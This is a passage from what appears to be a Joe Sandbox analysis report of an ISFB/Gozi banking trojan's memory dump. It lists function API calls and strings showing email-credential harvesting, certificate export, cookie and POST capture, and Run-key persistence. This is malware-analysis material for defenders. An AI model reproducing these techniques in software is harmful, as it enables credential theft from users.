lstrlenW.KERNEL32(00000000,?,001E82FB,Password2,?,001E82FB,Port,?,001E82FB,Secure_Connection,?,001E82FB,User_Name,?,001E82FB,Server), ref: 001C14A1
memcpy.NTDLL(00000000,?,?,?), ref: 001C14FA
LocalFree.KERNEL32(?,?), ref: 001C1511

Strings

User_Name, xrefs: 001C1405
P, xrefs: 001C13D0
POP3, xrefs: 001C13B9
Port, xrefs: 001C1420
Password2, xrefs: 001C1486
IMAP, xrefs: 001C13D9
Server, xrefs: 001C13EE
SMTP, xrefs: 001C13A9
Secure_Connection, xrefs: 001C1411
HTTPMail, xrefs: 001C13C9

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name
API String ID: 3649579052-2088458108
Opcode ID: ed231a264585fa272019c398a071aa516c055e3eadba70e0d58ef4f7178595d5
Instruction ID: 115121ce9875f85b93f04a0aa6e63a49a9a2885cb7106c20eb1e7cc48ab83e28
Opcode Fuzzy Hash: ed231a264585fa272019c398a071aa516c055e3eadba70e0d58ef4f7178595d5
Instruction Fuzzy Hash: A7518D71A40689BBCF11AFE5CD85EAFBBB9BF56304F10442AF511B6251DB70CA40CBA1

Uniqueness

Uniqueness Score: 100.00%

Function 001D9D53, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 156memorystringfileUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000), ref: 001D9D6A
lstrlen.KERNEL32(?,?,00000000), ref: 001D9D71
RtlAllocateHeap.NTDLL(00000000,?), ref: 001D9D88
lstrcpy.KERNEL32(00000000,?), ref: 001D9D99
lstrcat.KERNEL32(?,?), ref: 001D9DB5
lstrcat.KERNEL32(?,.pfx), ref: 001D9DBF
RtlAllocateHeap.NTDLL(00000000,?), ref: 001D9DD0
RtlAllocateHeap.NTDLL(00000000,?), ref: 001D9E68
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 001D9E98
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000), ref: 001D9EB1
CloseHandle.KERNEL32(00000000,?,00000000), ref: 001D9EBB
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 001D9ECB
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 001D9EE6
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 001D9EF6

Strings

.pfx, xrefs: 001D9DB7
ISFB, xrefs: 001D9E4B, 001D9E50, 001D9E78

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID: .pfx$ISFB
API String ID: 333890978-2368466137
Opcode ID: 527f725a52dee21be3064795f309e5a2db16fce97e68fe27aced77ea3b09dfb0
Instruction ID: 64e71ace8400ce7a10f0c0dd612e286d9be9a5284fd4551be3ef857a77578b57
Opcode Fuzzy Hash: 527f725a52dee21be3064795f309e5a2db16fce97e68fe27aced77ea3b09dfb0
Instruction Fuzzy Hash: 1A514A72800159BFDF11AFA8DCC4CAE7B7EFB08354B154066F915AB6A0D7318E85DB60

Uniqueness

Uniqueness Score: 100.00%

Function 001C2318, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 172stringmemoryUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(03E59608,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 001C233B
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 001C234A
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 001C2357
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001C236F
lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001C237B
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C2397
wsprintfA.USER32 ref: 001C244F
memcpy.NTDLL(00000000,?,?), ref: 001C2494
InterlockedExchange.KERNEL32(001E6058,00000000), ref: 001C24B0
HeapFree.KERNEL32(00000000,00000000), ref: 001C24F3

Part of subcall function 001C2AD8: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C2B01
Part of subcall function 001C2AD8: memcpy.NTDLL(00000000,?,?), ref: 001C2B14
Part of subcall function 001C2AD8: RtlEnterCriticalSection.NTDLL(001E6368), ref: 001C2B25
Part of subcall function 001C2AD8: RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001C2B3A
Part of subcall function 001C2AD8: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 001C2B72

Strings

Accept-Language: , xrefs: 001C23CF
USER: %s, xrefs: 001C2449
Referer: , xrefs: 001C23BB
Cookie: , xrefs: 001C23E9
URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: , xrefs: 001C247A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
API String ID: 4198405257-1852062776
Opcode ID: f86b0e2523f279537f12f78b8587e1d54ecaa8566dda808f6a7e90d5b1e19a14
Instruction ID: a0b1f9e57916c3ea3aff21f52d1dd4d0c3e9071e0f135715a90f746349696b59
Opcode Fuzzy Hash: f86b0e2523f279537f12f78b8587e1d54ecaa8566dda808f6a7e90d5b1e19a14
Instruction Fuzzy Hash: AD517971A0028AAFDF159FA5DC84FAE3BA9FB14304F14452AF811EB291D774DA50DB50

Uniqueness

Uniqueness Score: 100.00%

Function 001CB613, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 79stringmemoryfileUNIQUE

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,\sols,001CB300,?,?), ref: 001CB62A
lstrlenW.KERNEL32(\sols,?,00000000,?,?,?,\sols,001CB300,?,?), ref: 001CB635
lstrlenW.KERNEL32(?,?,00000000,?,?,?,\sols,001CB300,?,?), ref: 001CB63D
RtlAllocateHeap.NTDLL(00000000,?), ref: 001CB652
lstrcpyW.KERNEL32(00000000,?), ref: 001CB663
lstrcatW.KERNEL32(00000000,\sols), ref: 001CB675
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001CB300,?,?), ref: 001CB67A
lstrcatW.KERNEL32(00000000,001E2400), ref: 001CB686
lstrcatW.KERNEL32(00000000), ref: 001CB68E
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001CB300,?,?), ref: 001CB693
lstrcatW.KERNEL32(00000000,001E2400), ref: 001CB69F
lstrcatW.KERNEL32(00000000,00000002), ref: 001CB6BA
CopyFileW.KERNEL32(0000005C,00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001CB300,?,?), ref: 001CB6C2
HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001CB300,?,?), ref: 001CB6D0

Strings

\sols, xrefs: 001CB613, 001CB634, 001CB673

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID: \sols
API String ID: 3635185113-25449109
Opcode ID: 6a069009d9410a7fcf5da49ce16b4599540b19a0db4d19dfcf3d6e29b92d2a0a
Instruction ID: 3a13647ad764484f8ffb6b3ea4843af9bd31b506c45e41a2861f416fe169b1ce
Opcode Fuzzy Hash: 6a069009d9410a7fcf5da49ce16b4599540b19a0db4d19dfcf3d6e29b92d2a0a
Instruction Fuzzy Hash: CD210C32100215AFC322AFA4CCD9F6FBBACEF95B84F11001DF601965A0DBB09881CBA5

Uniqueness

Uniqueness Score: 100.00%

Function 001C955D, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 146registrystringfileUNIQUE

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 001C9581

Part of subcall function 001CECE4: RegCloseKey.ADVAPI32(001D62D8,001D62D8,00000000,00000000,00000000,00000000), ref: 001CED6B

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C95BC
lstrcpyW.KERNEL32(-00000002,?), ref: 001C961D
lstrcatW.KERNEL32(00000000,.exe), ref: 001C962B
lstrcpyW.KERNEL32(?), ref: 001C9645
lstrcatW.KERNEL32(00000000,.dll), ref: 001C964D

Part of subcall function 001C937C: lstrlenW.KERNEL32(?,.dll,?,00000000,001C76D1,?,?), ref: 001C938A
Part of subcall function 001C937C: lstrlen.KERNEL32(DllRegisterServer), ref: 001C9398
Part of subcall function 001C937C: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001C93AD

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 001C96AB

Part of subcall function 001D5F65: lstrlenW.KERNEL32(779F5520,00000000,00000000,779F5520,?,?,001D634D,?), ref: 001D5F71
Part of subcall function 001D5F65: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,001D634D,?), ref: 001D5F99
Part of subcall function 001D5F65: memset.NTDLL ref: 001D5FAB

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,?,00000080,00000000,00000000,?,00000000,?), ref: 001C96E0
GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 001C96EB
HeapFree.KERNEL32(00000000,00000000), ref: 001C9701
RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 001C9713

Strings

.exe, xrefs: 001C9625
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 001C9576
.dll, xrefs: 001C9647

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1430934453-2351516416
Opcode ID: 49e58f4f079804bf2212c3c2e2588aa2fa59463355e603e12a835d1ccf69994a
Instruction ID: 3c1a5da0586f1ee7a11a7a5b95286bdeaf47070f577947c8d1ba9a746143cce7
Opcode Fuzzy Hash: 49e58f4f079804bf2212c3c2e2588aa2fa59463355e603e12a835d1ccf69994a
Instruction Fuzzy Hash: 4A41903190125ABBDB11AFE1CD89FAE7B79FF24740F100129F601AA2A1DB35DA41DB64

Uniqueness

Uniqueness Score: 100.00%

Function 001C860C, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89registrymemorystringUNIQUE

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 001C861D
GetTempPathA.KERNEL32(00000000,00000000,?,?,001CF069,00000094,00000000,00000000), ref: 001C8635
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C8644
GetTempPathA.KERNEL32(00000001,00000000,?,?,001CF069,00000094,00000000,00000000), ref: 001C8657
GetTickCount.KERNEL32 ref: 001C865B
wsprintfA.USER32 ref: 001C866B
RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 001C869F
StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C86B7
lstrlen.KERNEL32(00000000), ref: 001C86C1
RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 001C86D1
RegCloseKey.ADVAPI32(?), ref: 001C86DD
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 001C86EB

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 001C8695
%lu.exe, xrefs: 001C8665

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3778301466-2576086316
Opcode ID: 4e41e7067ec8c8da380c7f9e8c0c9ae62bce4a54d2119da351dd406bcd40960b
Instruction ID: 23a0e16c54ab6afdb4d88eee62f6dfb77923a5a488717bfcefa68629e547033d
Opcode Fuzzy Hash: 4e41e7067ec8c8da380c7f9e8c0c9ae62bce4a54d2119da351dd406bcd40960b
Instruction Fuzzy Hash: DD215571401698BFDB119FA1DCC8EAF7FAEEF05399B004025F9069A160DB708E81DBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001D7A60, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 192memorystringthreadUNIQUE

Download Yara Rule

APIs

Part of subcall function 001DDFFE: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 001DE043
Part of subcall function 001DDFFE: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 001DE05B
Part of subcall function 001DDFFE: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE124
Part of subcall function 001DDFFE: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE14D
Part of subcall function 001DDFFE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE15D
Part of subcall function 001DDFFE: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE166

lstrcmp.KERNEL32(?,?), ref: 001D7AD7
HeapFree.KERNEL32(00000000,?), ref: 001D7B03
GetCurrentThreadId.KERNEL32 ref: 001D7BAF
GetCurrentThread.KERNEL32 ref: 001D7BC0
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_0000D0A7,?,00000001,00000100,00000000,00000000), ref: 001D7BFD
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_0000D0A7,?,00000001,00000100,00000000,00000000), ref: 001D7C11
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001D7C1F
wsprintfA.USER32 ref: 001D7C30
lstrlen.KERNEL32(00000000,00000000), ref: 001D7C3B

Part of subcall function 001C53BF: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,001C32C8,00000000,00000000,00000000,00000020,00000000,?,001C3A10,00000020,00000000,?,00000000), ref: 001C53C9
Part of subcall function 001C53BF: lstrcpy.KERNEL32(00000000,00000000), ref: 001C53ED
Part of subcall function 001C53BF: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,001C3A10,00000020,00000000,?,00000000,?,00000000,00000000), ref: 001C53F4
Part of subcall function 001C53BF: lstrcat.KERNEL32(00000000,?), ref: 001C544B

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 001D7C55
HeapFree.KERNEL32(00000000,00000000), ref: 001D7C66
HeapFree.KERNEL32(00000000,?), ref: 001D7C72

Strings

DLL load status: %u, xrefs: 001D7C2A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID: DLL load status: %u
API String ID: 773763258-2598350583
Opcode ID: 86b93e504ebb03f92b03d4281033fbf275e34dcc93d5baa75dc908dc613b5f03
Instruction ID: 8cb30ca9a2ed6df5e515c0916cbd7e00c5ea6f0edd1439bbd139808aefe3e899
Opcode Fuzzy Hash: 86b93e504ebb03f92b03d4281033fbf275e34dcc93d5baa75dc908dc613b5f03
Instruction Fuzzy Hash: 8C711371900259EFCB11DFE4DC85EAEBBB9FF08350F14406AF505A76A0E771AA80DB90

Uniqueness

Uniqueness Score: 100.00%

Function 001CADB9, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 146stringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

memset.NTDLL ref: 001CADE7
StrChrA.SHLWAPI(?,0000000D), ref: 001CAE2D
StrChrA.SHLWAPI(?,0000000A), ref: 001CAE3A
StrChrA.SHLWAPI(?,0000007C), ref: 001CAE61
StrTrimA.SHLWAPI(?,001E2404), ref: 001CAE76
StrChrA.SHLWAPI(?,0000003D), ref: 001CAE7F
StrTrimA.SHLWAPI(00000001,001E2404), ref: 001CAE95
_strupr.NTDLL ref: 001CAE9C
StrTrimA.SHLWAPI(?,?), ref: 001CAEA9
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001CAEF1
lstrlen.KERNEL32(?,00000000,?,?,001D2253,00000001,?,00000000,001D2253,?,?,00000001), ref: 001CAF10

Strings

;, xrefs: 001CAE4F
, xrefs: 001CAEA1

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: b6273a20df9a07c2f7de97888380d03e546c2735f02f39b4a19b71ef52d5aecb
Instruction ID: c1de2be6100724a836d72456ed76a192f78d2a3f5715d9a75bb56fb8c63f82ca
Opcode Fuzzy Hash: b6273a20df9a07c2f7de97888380d03e546c2735f02f39b4a19b71ef52d5aecb
Instruction Fuzzy Hash: 0F41F3B15043499FD712DF288C45F1FBBE8AF69708F44041DF4959B292DB74D9058B63

Uniqueness

Uniqueness Score: 100.00%

Function 001D538F, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134stringmemoryUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,779F5520,?,00000000,00000000,?,?), ref: 001D53A8
lstrlen.KERNEL32(?), ref: 001D53AE
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001D53BE
lstrcpy.KERNEL32(00000000,?), ref: 001D53D8
lstrlen.KERNEL32(?), ref: 001D53F0
lstrlen.KERNEL32(?), ref: 001D53FE
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 001D544C
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 001D5470
lstrlen.KERNEL32(?), ref: 001D549E
HeapFree.KERNEL32(00000000,?,?), ref: 001D54C9
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 001D54E0
HeapFree.KERNEL32(00000000,?,?), ref: 001D54ED

Strings

http, xrefs: 001D5477, 001D5487

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID: http
API String ID: 904523553-2541227442
Opcode ID: 25c929d062dff53c261fa89ce1bb80723534f81f6aa934754f259bfb598674bd
Instruction ID: 718a863123554720207d86d75bfd920e92420cf77bea8d9e5287f0cd3a97b5f5
Opcode Fuzzy Hash: 25c929d062dff53c261fa89ce1bb80723534f81f6aa934754f259bfb598674bd
Instruction Fuzzy Hash: 20418B71900649BFDF229FA4CC84A9E7BBAFF08301F108426F511962A0EB70AD90DF21

Uniqueness

Uniqueness Score: 100.00%

Function 001C5189, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringUNIQUE

Download Yara Rule

APIs

memset.NTDLL ref: 001C519E

Part of subcall function 001D5854: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,001C1CCA,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D5863
Part of subcall function 001D5854: mbstowcs.NTDLL ref: 001D587F

lstrlenW.KERNEL32(00000000,00000000,?), ref: 001C51D9
wcstombs.NTDLL ref: 001C51E3
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0C000000,00000000,?,00000044,?,?), ref: 001C5217
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 001C5243
TerminateProcess.KERNEL32(?,000003E5), ref: 001C5259
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 001C526D
GetLastError.KERNEL32 ref: 001C5271
GetExitCodeProcess.KERNEL32(?,00000001), ref: 001C5291
CloseHandle.KERNEL32(?), ref: 001C52A0
CloseHandle.KERNEL32(?), ref: 001C52A5
GetLastError.KERNEL32 ref: 001C52A9

Strings

D, xrefs: 001C51B4

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D
API String ID: 2463014471-2746444292
Opcode ID: 9cb68ef3a88550134949cfd23afb4ecd96c87617f3b21043e945898b5aa47d45
Instruction ID: acb45ff82ccbdb4d82a5a4a492fc33cfecc85e3644b613da8ea2175737a57fb9
Opcode Fuzzy Hash: 9cb68ef3a88550134949cfd23afb4ecd96c87617f3b21043e945898b5aa47d45
Instruction Fuzzy Hash: 2C411672D00658AFDF119FA4CC85EEEBBBDEB18340F14806AF915A6150D7759E80CF61

Uniqueness

Uniqueness Score: 100.00%

Function 001D67AC, Relevance: 21.2, APIs: 14, Instructions: 197memorystringthreadUNIQUE

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 001D67FB
StrTrimA.SHLWAPI(00000001,001E2404), ref: 001D680D
StrChrA.SHLWAPI(?,0000002C), ref: 001D6818
StrTrimA.SHLWAPI(00000001,001E2404), ref: 001D682A
lstrlen.KERNEL32(?,00000001,?,?), ref: 001D68C8
RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 001D68EA
lstrcpy.KERNEL32(00000020,?), ref: 001D6909
lstrlen.KERNEL32(?), ref: 001D6913
memcpy.NTDLL(?,?,?), ref: 001D6954
memcpy.NTDLL(?,?,?), ref: 001D6967
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001D698B
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 001D69AA
HeapFree.KERNEL32(00000000,?,00000001,?,?), ref: 001D69D0
HeapFree.KERNEL32(00000000,00000001,00000001,?,?), ref: 001D69EC

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: c896babde6748c5f4c44948ed82b9fbceae0015e5661d85cce413af7a23dc53f
Instruction ID: 5e1f343e7f499936b528212b47aa54402ec111ff8bedea61bfb09ded495f253c
Opcode Fuzzy Hash: c896babde6748c5f4c44948ed82b9fbceae0015e5661d85cce413af7a23dc53f
Instruction Fuzzy Hash: B471A832104341AFD721DF68CC91B5FBBE8FB88318F04492EF599962A1D770E984CB92

Uniqueness

Uniqueness Score: 100.00%

Function 001C397E, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114memorythreadstringUNIQUE

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 001C39A2
GetCurrentThreadId.KERNEL32 ref: 001C39B8
GetCurrentThread.KERNEL32 ref: 001C39C9

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

Part of subcall function 001C32AC: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,?,00000000,00000000,00000020,00000000,?,001C3A10,00000020,00000000,?), ref: 001C3317
Part of subcall function 001C32AC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,?,00000000,00000000,00000020,00000000,?,001C3A10,00000020,00000000,?), ref: 001C333F

HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 001C3A3E
HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 001C3A4E
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C3A9A
wsprintfA.USER32 ref: 001C3AAB
lstrlen.KERNEL32(00000000,00000000), ref: 001C3AB6
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 001C3AD0

Strings

W, xrefs: 001C3A87
PluginRegisterCallbacks, xrefs: 001C3A5A
DLL load status: %u, xrefs: 001C3AA5

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: DLL load status: %u$PluginRegisterCallbacks$W
API String ID: 630447368-2893651616
Opcode ID: 5f80d9d617032488458e64bcfc68cab789abb07003a0b1a79e52d6812e9db90e
Instruction ID: 3dc785883e1a16b7b7338f37c4fbace80f61cd7e59c072b68e08b88c988d3ec7
Opcode Fuzzy Hash: 5f80d9d617032488458e64bcfc68cab789abb07003a0b1a79e52d6812e9db90e
Instruction Fuzzy Hash: 2741AD30901259FFCF11AFA1DC88EAEBFB9EF14794B108019F915DA560D730CAA0DBA1

Uniqueness

Uniqueness Score: 100.00%

Function 001DE617, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 113memorystringUNIQUE

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(?), ref: 001DE631
PathFindFileNameW.SHLWAPI(?), ref: 001DE647
lstrlenW.KERNEL32(00000000), ref: 001DE68A
RtlAllocateHeap.NTDLL(00000000,001E0BF3), ref: 001DE6A0
memcpy.NTDLL(00000000,00000000,001E0BF1), ref: 001DE6B3
_wcsupr.NTDLL ref: 001DE6BE
lstrlenW.KERNEL32(?), ref: 001DE6ED
RtlAllocateHeap.NTDLL(00000000,?), ref: 001DE702
lstrcpyW.KERNEL32(00000000,?), ref: 001DE718
lstrcatW.KERNEL32(00000000, --use-spdy=off --disable-http2), ref: 001DE736
HeapFree.KERNEL32(00000000,00000000), ref: 001DE745

Strings

--use-spdy=off --disable-http2, xrefs: 001DE730

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID: --use-spdy=off --disable-http2
API String ID: 3868788785-3215622688
Opcode ID: 9ea97dbafcf1a05c4c38d8892f112e844dae3317ccce97eba586f4b1fa06892d
Instruction ID: ef72b1a4f7ab39a7f0ef95d4e6811e3982dd1ef24dbf68069193d2cdfa86606f
Opcode Fuzzy Hash: 9ea97dbafcf1a05c4c38d8892f112e844dae3317ccce97eba586f4b1fa06892d
Instruction Fuzzy Hash: 8E310732200654AFC7206FA49CC8E2F7BEDEB59722F14451AF611DA6A1DB74DC808B91

Uniqueness

Uniqueness Score: 100.00%

Function 001D1A1F, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 78memoryfileUNIQUE

Download Yara Rule

APIs

